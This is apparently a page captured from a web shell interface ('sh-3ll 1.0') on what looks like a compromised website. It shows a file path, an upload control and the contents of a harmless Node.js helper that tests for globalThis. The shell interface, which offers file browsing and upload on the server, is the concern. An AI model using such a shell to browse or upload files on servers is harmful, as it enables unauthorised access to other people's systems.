HOME


sh-3ll 1.0
DIR:/proc/self/cwd/bright.medisavehealthcarebd.com/node_modules/ext/global-this/
Upload File :
Current File : //proc/self/cwd/bright.medisavehealthcarebd.com/node_modules/ext/global-this/is-implemented.js
"use strict";

module.exports = function () {
	if (typeof globalThis !== "object") return false;
	if (!globalThis) return false;
	return globalThis.Array === Array;
};